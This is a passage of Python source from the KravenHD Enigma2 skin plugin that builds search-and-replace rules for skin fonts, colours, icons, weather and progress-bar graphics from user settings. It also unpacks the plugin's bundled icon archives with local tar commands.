X1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,972\" size=\"722,55\"', 'font=\"Regular;33\" position=\"644,981\" size=\"722,42\"']) # X1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"298,876\" size=\"1061,55\"', 'font=\"Regular;33\" position=\"298,885\" size=\"1061,42\"']) # no picon now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"298,954\" size=\"1061,55\"', 'font=\"Regular;33\" position=\"298,963\" size=\"1061,42\"']) # no picon next\n\t\t\telif config.plugins.KravenHD.IBFontSize.value == \"middle\":\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,830\" size=\"750,55\"', 'font=\"Regular;39\" position=\"817,833\" size=\"750,49\"']) # ZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,965\" size=\"589,55\"', 'font=\"Regular;39\" position=\"817,968\" size=\"589,49\"']) # ZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,790\" size=\"750,55\"', 'font=\"Regular;39\" position=\"817,793\" size=\"750,49\"']) # ZZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,925\" size=\"589,55\"', 'font=\"Regular;39\" position=\"817,928\" size=\"589,49\"']) # ZZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"657,921\" size=\"708,55\"', 'font=\"Regular;39\" position=\"657,924\" size=\"708,49\"']) # ZZ2, ZZ3 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"765,999\" size=\"655,55\"', 'font=\"Regular;39\" position=\"765,1002\" size=\"655,49\"']) # ZZ3 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,921\" size=\"722,55\"', 'font=\"Regular;39\" position=\"644,924\" size=\"722,49\"']) # X2, X3, Z1, Z2 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,999\" size=\"722,55\"', 'font=\"Regular;39\" position=\"644,1002\" size=\"722,49\"']) # X2, X3, Z1, Z2 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,837\" size=\"722,55\"', 'font=\"Regular;39\" position=\"644,840\" size=\"722,49\"']) # X1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,972\" size=\"722,55\"', 'font=\"Regular;39\" position=\"644,975\" size=\"722,49\"']) # X1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"298,876\" size=\"1061,55\"', 'font=\"Regular;39\" position=\"298,879\" size=\"1061,49\"']) # no picon now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"298,954\" size=\"1061,55\"', 'font=\"Regular;39\" position=\"298,957\" size=\"1061,49\"']) # no picon next\n\n\t\t### ChannelSelection (Event-Description) Font-Size and Primetime\n\t\tif self.actChannelselectionstyle == \"channelselection-style-minitv3\":\n\t\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actChannelselectionstyle == \"channelselection-style-nobile-minitv3\":\n\t\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actChannelselectionstyle in (\"channelselection-style-nobile\", \"channelselection-style-nobile2\", \"channelselection-style-nobile-minitv\", \"channelselection-style-nobile-minitv3\", \"channelselection-style-nobile-minitv33\"):\n\t\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actChannelselectionstyle == \"channelselection-style-minitv22\":\n\t\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### ChannelSelection 'not available' Font\n\t\tself.skinSearchAndReplace.append(['name=\"KravenNotAvailable\" value=\"#00FFEA04', 'name=\"KravenNotAvailable\" value=\"#00' + config.plugins.KravenHD.ChannelSelectionServiceNA.value])\n\n\t\t### GraphicalEPG colors\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMESelFg\" value=\"#00ffffff', 'name=\"KravenGMESelFg\" value=\"#00' + config.plugins.KravenHD.GMESelFg.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMESelBg\" value=\"#00389416', 'name=\"KravenGMESelBg\" value=\"#00' + config.plugins.KravenHD.GMESelBg.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMENowFg\" value=\"#00F0A30A', 'name=\"KravenGMENowFg\" value=\"#00' + config.plugins.KravenHD.GMENowFg.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMENowBg\" value=\"#00389416', 'name=\"KravenGMENowBg\" value=\"#00' + config.plugins.KravenHD.GMENowBg.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenGMEBorder\" value=\"#00ffffff', 'name=\"KravenGMEBorder\" value=\"#00' + config.plugins.KravenHD.GMEBorder.value])\n\n\t\t### Icons\n\t\tif config.plugins.KravenHD.IBColor.value == \"only-infobar\":\n\t\t\tif config.plugins.KravenHD.IconStyle2.value == \"icons-dark2\":\n\t\t\t\tself.skinSearchAndReplace.append([\"/global-icons/\", \"/icons-dark/\"])\n\t\t\t\tself.skinSearchAndReplace.append([\"/infobar-global-icons/\", \"/icons-dark/\"])\n\t\t\telif config.plugins.KravenHD.IconStyle2.value == \"icons-light2\":\n\t\t\t\tself.skinSearchAndReplace.append([\"/global-icons/\", \"/icons-light/\"])\n\t\t\t\tself.skinSearchAndReplace.append([\"/infobar-global-icons/\", \"/icons-light/\"])\n\t\t\tif config.plugins.KravenHD.IconStyle.value == \"icons-dark\":\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIcon\" value=\"#00fff0e0\"', 'name=\"KravenIcon\" value=\"#00000000\"'])\n\t\t\t\tself.skinSearchAndReplace.append([\"infobar-icons\", \"icons-dark\"])\n\t\t\telif config.plugins.KravenHD.IconStyle.value == \"icons-light\":\n\t\t\t\tself.skinSearchAndReplace.append([\"infobar-icons\", \"icons-light\"])\n\t\telif config.plugins.KravenHD.IBColor.value == \"all-screens\":\n\t\t\tif config.plugins.KravenHD.IconStyle2.value == \"icons-dark2\":\n\t\t\t\tself.skinSearchAndReplace.append([\"/global-icons/\", \"/icons-dark/\"])\n\t\t\telif config.plugins.KravenHD.IconStyle2.value == \"icons-light2\":\n\t\t\t\tself.skinSearchAndReplace.append([\"/global-icons/\", \"/icons-light/\"])\n\t\t\tif config.plugins.KravenHD.IconStyle.value == \"icons-dark\":\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIcon\" value=\"#00fff0e0\"', 'name=\"KravenIcon\" value=\"#00000000\"'])\n\t\t\t\tself.skinSearchAndReplace.append([\"infobar-icons\", \"icons-dark\"])\n\t\t\t\tself.skinSearchAndReplace.append([\"/infobar-global-icons/\", \"/icons-dark/\"])\n\t\t\telif config.plugins.KravenHD.IconStyle.value == \"icons-light\":\n\t\t\t\tself.skinSearchAndReplace.append([\"infobar-icons\", \"icons-light\"])\n\t\t\t\tself.skinSearchAndReplace.append([\"/infobar-global-icons/\", \"/icons-light/\"])\n\n\t\tconsole2 = eConsoleAppContainer()\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.IconStyle2.value == \"icons-light2\":\n\t\t\t\tconsole2.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/icons-white.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\t\telse:\n\t\t\t\tconsole2.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/icons-black.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\telse:\n\t\t\tif config.plugins.KravenHD.IconStyle2.value == \"icons-light2\":\n\t\t\t\tconsole2.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/icons-white.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\t\telse:\n\t\t\t\tconsole2.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/icons-black.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\n\t\t### Weather-Server\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.WeatherView.value == \"meteo\":\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"50,50\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"50,50\" render=\"Label\" font=\"Meteo; 40\" halign=\"right\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"50,50\" path=\"WetterIcons\" render=\"KravenHDWetterPicon\" alphatest=\"blend\"', 'size=\"50,50\" render=\"Label\" font=\"Meteo; 45\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"70,70\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"70,70\" render=\"Label\" font=\"Meteo; 60\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"100,100\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"100,100\" render=\"Label\" font=\"Meteo; 1000\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['\"KravenHDWeather\">icon', '\"KravenHDWeather\">meteo'])\n\t\telse:\n\t\t\tif config.plugins.KravenHD.WeatherView.value == \"meteo\":\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"75,75\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"75,75\" render=\"Label\" font=\"Meteo;60\" halign=\"right\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"75,75\" path=\"WetterIcons\" render=\"KravenHDWetterPicon\" alphatest=\"blend\"', 'size=\"75,75\" render=\"Label\" font=\"Meteo;67\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"105,105\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"105,105\" render=\"Label\" font=\"Meteo;90\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['size=\"150,150\" render=\"KravenHDWetterPicon\" alphatest=\"blend\" path=\"WetterIcons\"', 'size=\"150,150\" render=\"Label\" font=\"Meteo;1500\" halign=\"center\" valign=\"center\" foregroundColor=\"KravenMeteo\" noWrap=\"1\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['\"KravenHDWeather\">icon', '\"KravenHDWeather\">meteo'])\n\n\t\t### Meteo-Font\n\t\tif config.plugins.KravenHD.MeteoColor.value == \"meteo-dark\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenMeteo\" value=\"#00fff0e0\"', 'name=\"KravenMeteo\" value=\"#00000000\"'])\n\n\t\t### Selection Style\n\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"custom\":\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_28.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_32.png\"', \" \"])\n\t\tif config.plugins.KravenHD.SelectionStyle.value == \"color\":\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_CS.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_MS.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_ES.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_ESM.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_30.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_36.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_40.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_45.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_50.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_53.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_60.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_70.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_75.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_90.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_110.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_135.png\"', \" \"])\n\t\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"global\":\n\t\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_28.png\"', \" \"])\n\t\t\t\tself.skinSearchAndReplace.append(['selectionPixmap=\"KravenHD/graphics/sel_32.png\"', \" \"])\n\t\telse:\n\t\t\t# ChannelSelection\n\t\t\tCSitems = config.usage.serviceitems_per_page.value\n\t\t\tCSheight = \"\"\n\t\t\tCSlines = \"\"\n\t\t\tif config.usage.servicelist_twolines.value == True:\n\t\t\t\tCSlines = 2\n\t\t\telse:\n\t\t\t\tCSlines = 1\n\t\t\tif self.actChannelselectionstyle in (\"channelselection-style-nobile-minitv\", \"channelselection-style-nobile-minitv3\", \"channelselection-style-nobile-minitv33\"):\n\t\t\t\tCSheight = 348\n\t\t\telif self.actChannelselectionstyle in (\"channelselection-style-nobile\", \"channelselection-style-nobile2\"):\n\t\t\t\tCSheight = 580\n\t\t\telif self.actChannelselectionstyle == \"channelselection-style-minitv2\":\n\t\t\t\tCSheight = 420\n\t\t\telif self.actChannelselectionstyle == \"channelselection-style-minitv-picon\":\n\t\t\t\tCSheight = 396\n\t\t\telse:\n\t\t\t\tCSheight = 560\n\t\t\tself.actCSItemHeight = int(((CSheight / CSitems) * CSlines) +1)\n\n\t\t\t# MovieSelection\n\t\t\tMSitems = config.movielist.itemsperpage.value\n\t\t\tif (MSitems <= 8):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_90.png'])\n\t\t\tif (9 <= MSitems <= 11):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_60.png'])\n\t\t\tif (12 <= MSitems <= 14):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_45.png'])\n\t\t\tif (15 <= MSitems <= 17):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_36.png'])\n\t\t\tif (18 <= MSitems):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_MS.png', 'sel_30.png'])\n\n\t\t\t# EPGSelection\n\t\t\tESitems = config.epgselection.enhanced_itemsperpage.value\n\t\t\tif (ESitems <= 10):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ES.png', 'sel_70.png'])\n\t\t\tif (11 <= ESitems <= 13):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ES.png', 'sel_45.png'])\n\t\t\tif (14 <= ESitems <= 16):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ES.png', 'sel_36.png'])\n\t\t\tif (17 <= ESitems):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ES.png', 'sel_30.png'])\n\n\t\t\t# EPGSelectionMulti\n\t\t\tESMitems = config.epgselection.multi_itemsperpage.value\n\t\t\tif (ESMitems <= 10):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ESM.png', 'sel_70.png'])\n\t\t\tif (11 <= ESMitems <= 13):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ESM.png', 'sel_45.png'])\n\t\t\tif (14 <= ESMitems <= 16):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ESM.png', 'sel_36.png'])\n\t\t\tif (17 <= ESMitems):\n\t\t\t\tself.skinSearchAndReplace.append(['sel_ESM.png', 'sel_30.png'])\n\n\t\t### Progress\n\t\tif not config.plugins.KravenHD.Progress.value == \"progress\":\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress18.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' picServiceEventProgressbar=\"KravenHD/progress/progress52.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress170.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress248.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress270.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress300.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress328.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress380.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress410.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress480.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress657.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress736.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress990.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress1265.png\"', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenProgress\" value=\"#00C3461B', 'name=\"KravenProgress\" value=\"#00' + config.plugins.KravenHD.Progress.value])\n\n\t\t### Infobar Progress\n\t\tif not config.plugins.KravenHD.IBProgress.value == \"progress\":\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress581.png\"', \" \"]) # zz2, zz3\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress657_2.png\"', \" \"]) # zz1, zzz1\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress749.png\"', \" \"]) # x1, x2, x3, z1, z2, timeshift\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress858.png\"', \" \"]) # player\n\t\t\tself.skinSearchAndReplace.append([' pixmap=\"KravenHD/progress/progress977.png\"', \" \"]) # nopicon\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBProgress\" value=\"#00000000', 'name=\"KravenIBProgress\" value=\"#00' + config.plugins.KravenHD.IBProgress.value])\n\n\t\t### Infobar Progress Background\n\t\tif config.plugins.KravenHD.IBProgressBackgroundList.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', '\"blend\" /> -->'])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['', '\"blend\" />'])\n\t\t\tself.makeProgressBackground(878, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_pl\") # player\n\t\t\tself.makeProgressBackground(769, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_ts\") # x1, x2, x3, z1, z2, timeshift\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-nopicon\":\n\t\t\t\tself.makeProgressBackground(997, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_np\") # nopicon\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\tself.makeProgressBackground(677, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_zz1\") # zz1, zzz1\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tself.makeProgressBackground(601, config.plugins.KravenHD.IBProgressBackground.value, \"progress_bg_zz2\") # zz2, zz3\n\n\t\t### Infobar Progress Border/line\n\t\tif config.plugins.KravenHD.IBProgressBorderLine.value == \"ib-progress-border\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBProgressBorderLine\" value=\"#00000000', 'name=\"KravenIBProgressBorderLine\" value=\"#00' + config.plugins.KravenHD.IBProgressBorderLineColor.value])\n\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBProgressBorderLine\" zPosition=\"2\"', 'backgroundColor=\"KravenIBProgressBorderLine\" zPosition=\"-99\"'])\n\t\telif config.plugins.KravenHD.IBProgressBorderLine.value == \"ib-progress-line\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBProgressBorderLine\" value=\"#00000000', 'name=\"KravenIBProgressBorderLine\" value=\"#00' + config.plugins.KravenHD.IBProgressBorderLineColor.value])\n\t\t\tself.skinSearchAndReplace.append(['borderColor=\"KravenIBProgressBorderLine\" borderWidth=\"1\"', ' '])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBProgressBorderLine\" zPosition=\"2\"', 'backgroundColor=\"KravenIBProgressBorderLine\" zPosition=\"-99\"'])\n\t\t\tself.skinSearchAndReplace.append(['borderColor=\"KravenIBProgressBorderLine\" borderWidth=\"1\"', ' '])\n\n\t\t### Border\n\t\tself.skinSearchAndReplace.append(['name=\"KravenBorder\" value=\"#00ffffff', 'name=\"KravenBorder\" value=\"#00' + config.plugins.KravenHD.Border.value])\n\n\t\t### MiniTV Border\n\t\tself.skinSearchAndReplace.append(['name=\"KravenBorder2\" value=\"#003F3F3F', 'name=\"KravenBorder2\" value=\"#00' + config.plugins.KravenHD.MiniTVBorder.value])\n\n\t\t### NumberZap Border\n\t\tif not config.plugins.KravenHD.NumberZapExt.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenNZBorder\" value=\"#00ffffff', 'name=\"KravenNZBorder\" value=\"#00' + config.plugins.KravenHD.NZBorder.value])\n\n\t\t### Line\n\t\tself.skinSearchAndReplace.append(['name=\"KravenLine\" value=\"#00ffffff', 'name=\"KravenLine\" value=\"#00' + config.plugins.KravenHD.Line.value])\n\n\t\t### Runningtext\n\t\tif config.plugins.KravenHD.RunningText.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append([\"movetype=running\", \"movetype=none\"])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append([\"startdelay=5000\", config.plugins.KravenHD.RunningText.value])\n\n\t\t\t# vertical RunningText\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tself.skinSearchAndReplace.append([\"steptime=90\", config.plugins.KravenHD.RunningTextSpeed.value])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append([\"steptime=90\", config.plugins.KravenHD.RunningTextSpeed2.value])\n\n\t\t\t# horizontal RunningText\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=200\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=66\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=100\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=33\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=66\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=22\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=50\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=17\"])\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=200\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=66\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=100\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=33\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=50\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=17\"])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=33\":\n\t\t\t\t\tself.skinSearchAndReplace.append([\"steptime=80\", \"steptime=11\"])\n\n\t\t### Scrollbar\n\t\tif config.plugins.KravenHD.ScrollBar.value == \"on\":\n\t\t\tself.skinSearchAndReplace.append(['scrollbarMode=\"showNever\"', 'scrollbarMode=\"showOnDemand\"'])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['scrollbarMode=\"showOnDemand\"', 'scrollbarMode=\"showNever\"'])\n\t\t\t\t\t\n\t\t### Scrollbar - showNever\n\t\tself.skinSearchAndReplace.append(['scrollbarMode=\"never\"', 'scrollbarMode=\"showNever\"'])\n\n\t\t### ibar invisible\n\t\tif config.plugins.KravenHD.IBColor.value == \"only-infobar\":\n\t\t\tself.skinSearchAndReplace.append(['foregroundColor=\"KravenIBGFont1\"', 'foregroundColor=\"KravenFont1\"']) # IB font 1 -> global font 1\n\t\t\tself.skinSearchAndReplace.append(['foregroundColor=\"KravenIBGFont2\"', 'foregroundColor=\"KravenFont2\"']) # IB font 2 -> global font 2\n\t\t\tself.skinSearchAndReplace.append(['', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['', \" \"])\n\t\t\tself.skinSearchAndReplace.append(['', \" \"])\n\n\t\t### Menu\n\t\tif config.plugins.KravenHD.IBColor.value == \"all-screens\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif 